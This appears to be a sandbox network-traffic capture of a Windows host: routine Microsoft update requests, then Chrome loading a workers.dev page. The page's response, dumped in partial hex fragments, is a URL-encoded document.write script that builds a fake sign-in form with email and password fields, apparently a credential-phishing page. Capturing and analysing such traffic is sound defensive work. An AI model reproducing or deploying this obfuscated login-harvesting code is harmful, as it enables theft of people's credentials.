2024-04-28 23:11:21 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/073D) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=114746 Date: Sun, 28 Apr 2024 23:11:21 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	23.11.208.106	443

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:22 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-28 23:11:22 UTC	530	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0DMGnYgAAAACXaXykPZuVRq4aV6pCkeO8U0pDRURHRTAzMTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=98234 Date: Sun, 28 Apr 2024 23:11:22 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-28 23:11:22 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49746	13.85.23.86	443

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:24 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vkkYdLFfe5F6fPB&MD=dEo2Yeht HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-28 23:11:25 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: e00395a2-acfd-4927-81ba-d20747ef0f8a MS-RequestId: 853d7713-23b8-404e-94dc-33c703b70ce6 MS-CV: CAZ3oYAa7k+5jngv.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 28 Apr 2024 23:11:24 GMT Connection: close Content-Length: 24490
2024-04-28 23:11:25 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-04-28 23:11:25 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	104.21.55.4	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:39 UTC	678	OUT	GET / HTTP/1.1 Host: vbvfdvdjvv.fyfyvfytvghv.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:39 UTC	571	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:11:39 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 9370 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QOUO72D8PhTSE5cVD4QpxEw7PH4PLE6oc7A6Jsov5dxXMtrLDlwXJf8TrhBRDKyZtm%2FHTbVmZNp9kX%2Bi9ka6VEnAERzUhf7T790zEwxNLsGi76SuCrFaXkusk8qqMk9x%2FZfvOThkuyFEbTk0aPDTnLjDqXAU8g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87babb8eeb7386ff-ORD alt-svc: h3=":443"; ma=86400
2024-04-28 23:11:39 UTC	798	IN	Data Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 30 41 25 33 43 68 74 6d 6c 25 33 45 25 30 41 25 32 30 25 32 30 25 33 43 68 65 61 64 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 63 68 61 72 73 65 74 25 33 44 25 32 32 75 74 66 2d 38 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 6e 61 6d 65 25 33 44 25 32 32 76 69 65 77 70 6f 72 74 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 77 69 64 74 68 25 33 44 64 65 76 69 63 65 2d 77 69 64 74 68 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 74 Data Ascii: <<script>...document.write(unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%0A%20%20%20%20%3Ct
2024-04-28 23:11:39 UTC	1369	IN	Data Raw: 2d 62 6f 74 74 6f 6d 25 33 41 25 32 30 31 70 78 25 32 30 73 6f 6c 69 64 25 32 30 25 32 33 39 39 39 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 31 30 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 70 61 64 64 69 6e 67 25 33 41 25 32 30 35 70 78 25 33 42 25 30 41 25 32 30 25 32 30 66 6f 6e 74 2d 73 69 7a 65 25 33 41 25 32 30 31 36 70 78 25 33 42 25 30 41 25 32 30 25 32 30 6f 75 74 6c 69 6e 65 25 33 41 25 32 30 6e 6f 6e 65 25 33 42 25 30 41 25 37 44 25 30 41 2e 66 6f 72 6d 61 6c 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 32 35 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 41 25 32 30 Data Ascii: -bottom%3A%201px%20solid%20%23999%3B%0A%20%20width%3A%20100%25%3B%0A%20%20padding%3A%205px%3B%0A%20%20font-size%3A%2016px%3B%0A%20%20outline%3A%20none%3B%0A%7D%0A.formal%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2025%25%3B%0A%20%20margin%3A%20
2024-04-28 23:11:39 UTC	1369	IN	Data Raw: 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 32 70 78 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 68 65 69 67 68 74 25 33 41 25 32 30 33 33 70 78 25 33 42 25 30 41 25 37 44 25 30 41 2e 6f 70 74 69 6f 6e 73 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 41 25 32 30 61 75 74 6f 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 2d 74 6f 70 25 33 41 25 32 30 32 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 62 6f 78 2d 73 68 61 64 6f 77 25 33 41 30 25 32 30 32 70 78 25 32 30 36 70 78 25 32 30 72 67 62 25 32 38 30 25 32 30 30 25 32 30 30 25 32 30 2f 25 Data Ascii: %20width%3A%2032px%3B%0A%20%20%20%20height%3A%2033px%3B%0A%7D%0A.options%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2030%25%3B%0A%20%20margin%3A%20auto%3B%0A%20%20margin-top%3A%202%25%3B%0A%20%20box-shadow%3A0%202px%206px%20rgb%280%200%200%20/%
2024-04-28 23:11:39 UTC	1369	IN	Data Raw: 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 32 25 32 30 61 6c 74 25 33 44 25 32 32 25 32 32 25 33 45 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 67 6e 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 70 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6d 61 69 6c 25 32 32 25 33 45 25 33 43 2f 70 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 68 31 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 6e 25 32 32 25 33 45 53 69 67 6e 25 32 Data Ascii: o_ee5c8d9fb6248c938fd0dc19370e90bd.svg%22%20alt%3D%22%22%3E%0A%0A%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22sign%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cp%20class%3D%22mail%22%3E%3C/p%3E%0A%20%20%20%20%20%20%20%20%20%20%3Ch1%20class%3D%22sin%22%3ESign%2
2024-04-28 23:11:39 UTC	1369	IN	Data Raw: 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6e 65 78 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 75 74 74 6f 6e 25 32 30 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 70 65 73 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 Data Ascii: type%3D%22%22%20class%3D%22next%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cbutton%20type%3D%22%22%20class%3D%22pest%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%3Cbr%3E%3Cbr%3E%3Cbr%3E%0A%20%20%20%2
2024-04-28 23:11:39 UTC	1369	IN	Data Raw: 32 37 2e 6d 61 69 6c 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 6e 6f 61 63 63 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6e 6f 61 63 63 63 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 63 72 65 61 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 63 72 65 61 74 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 62 75 74 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6e 65 78 74 Data Ascii: 27.mail%27%29%0A%20%20%20%20%20%20const%20noacc%20%3D%20document.querySelector%28%27.noaccc%27%29%0A%20%20%20%20%20%20const%20creat%20%3D%20document.querySelector%28%27.creat%27%29%0A%20%20%20%20%20%20const%20butt%20%3D%20document.querySelector%28%27.next
2024-04-28 23:11:39 UTC	1369	IN	Data Raw: 30 70 77 64 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 62 75 74 74 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 38 25 32 37 63 6c 69 63 6b 25 32 37 25 32 43 25 32 30 25 32 38 25 32 39 25 33 44 25 33 45 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 30 25 33 44 25 32 30 25 32 37 62 6c 6f 63 6b 25 32 37 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 Data Ascii: 0pwd.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%7D%29%0A%0A%20%20buttA.addEventListener%28%27click%27%2C%20%28%29%3D%3E%7B%0A%20%20%20%20zip.style.display%20%3D%20%27block%27%0A%20%20%20%20zip.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%20%20%20%20%2
2024-04-28 23:11:39 UTC	358	IN	Data Raw: 25 32 30 25 32 30 25 32 30 25 37 44 25 32 43 25 32 30 65 72 72 6f 72 25 32 30 25 33 44 25 33 45 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 61 6c 65 72 74 25 32 38 25 32 32 4d 65 73 73 61 67 65 25 32 30 6e 6f 74 25 32 30 73 65 6e 74 25 32 32 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 25 32 38 65 72 72 6f 72 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 Data Ascii: %20%20%20%7D%2C%20error%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%22Message%20not%20sent%22%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20console.log%28error%29%0A%0A%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%20%20%20%2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49753	104.21.55.4	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:39 UTC	578	OUT	GET /style.css HTTP/1.1 Host: vbvfdvdjvv.fyfyvfytvghv.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:39 UTC	573	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:11:39 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 9370 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8O0HBSjSqSM8h2Wc6YF1NzwNpNG0c%2FL7E3r5VhfDPgTi2ulyQWOfSx%2Fk0AXf9vQZsORWVHUJ591j91wRudr6fAQAKHJA26wzZrdabf9crocAdJPGSxIhogbm7nhgunu58h%2BXhkG3%2FJfc3uJlFvHPmHKGwn4OtQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87babb8fcb068f4e-ORD alt-svc: h3=":443"; ma=86400
2024-04-28 23:11:39 UTC	796	IN	Data Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 30 41 25 33 43 68 74 6d 6c 25 33 45 25 30 41 25 32 30 25 32 30 25 33 43 68 65 61 64 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 63 68 61 72 73 65 74 25 33 44 25 32 32 75 74 66 2d 38 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 6e 61 6d 65 25 33 44 25 32 32 76 69 65 77 70 6f 72 74 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 77 69 64 74 68 25 33 44 64 65 76 69 63 65 2d 77 69 64 74 68 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 74 Data Ascii: <<script>...document.write(unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%0A%20%20%20%20%3Ct
2024-04-28 23:11:39 UTC	1369	IN	Data Raw: 65 72 2d 62 6f 74 74 6f 6d 25 33 41 25 32 30 31 70 78 25 32 30 73 6f 6c 69 64 25 32 30 25 32 33 39 39 39 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 31 30 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 70 61 64 64 69 6e 67 25 33 41 25 32 30 35 70 78 25 33 42 25 30 41 25 32 30 25 32 30 66 6f 6e 74 2d 73 69 7a 65 25 33 41 25 32 30 31 36 70 78 25 33 42 25 30 41 25 32 30 25 32 30 6f 75 74 6c 69 6e 65 25 33 41 25 32 30 6e 6f 6e 65 25 33 42 25 30 41 25 37 44 25 30 41 2e 66 6f 72 6d 61 6c 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 32 35 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 41 25 Data Ascii: er-bottom%3A%201px%20solid%20%23999%3B%0A%20%20width%3A%20100%25%3B%0A%20%20padding%3A%205px%3B%0A%20%20font-size%3A%2016px%3B%0A%20%20outline%3A%20none%3B%0A%7D%0A.formal%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2025%25%3B%0A%20%20margin%3A%
2024-04-28 23:11:39 UTC	1369	IN	Data Raw: 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 32 70 78 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 68 65 69 67 68 74 25 33 41 25 32 30 33 33 70 78 25 33 42 25 30 41 25 37 44 25 30 41 2e 6f 70 74 69 6f 6e 73 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 41 25 32 30 61 75 74 6f 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 2d 74 6f 70 25 33 41 25 32 30 32 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 62 6f 78 2d 73 68 61 64 6f 77 25 33 41 30 25 32 30 32 70 78 25 32 30 36 70 78 25 32 30 72 67 62 25 32 38 30 25 32 30 30 25 32 30 30 25 32 30 Data Ascii: 20%20width%3A%2032px%3B%0A%20%20%20%20height%3A%2033px%3B%0A%7D%0A.options%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2030%25%3B%0A%20%20margin%3A%20auto%3B%0A%20%20margin-top%3A%202%25%3B%0A%20%20box-shadow%3A0%202px%206px%20rgb%280%200%200%20
2024-04-28 23:11:39 UTC	1369	IN	Data Raw: 6f 67 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 32 25 32 30 61 6c 74 25 33 44 25 32 32 25 32 32 25 33 45 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 67 6e 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 70 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6d 61 69 6c 25 32 32 25 33 45 25 33 43 2f 70 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 68 31 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 6e 25 32 32 25 33 45 53 69 67 6e Data Ascii: ogo_ee5c8d9fb6248c938fd0dc19370e90bd.svg%22%20alt%3D%22%22%3E%0A%0A%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22sign%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cp%20class%3D%22mail%22%3E%3C/p%3E%0A%20%20%20%20%20%20%20%20%20%20%3Ch1%20class%3D%22sin%22%3ESign
2024-04-28 23:11:39 UTC	1369	IN	Data Raw: 32 30 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6e 65 78 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 75 74 74 6f 6e 25 32 30 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 70 65 73 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 Data Ascii: 20type%3D%22%22%20class%3D%22next%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cbutton%20type%3D%22%22%20class%3D%22pest%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%3Cbr%3E%3Cbr%3E%3Cbr%3E%0A%20%20%20
2024-04-28 23:11:39 UTC	1369	IN	Data Raw: 38 25 32 37 2e 6d 61 69 6c 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 6e 6f 61 63 63 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6e 6f 61 63 63 63 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 63 72 65 61 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 63 72 65 61 74 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 62 75 74 74 25 32 30 25 33 44 25 32 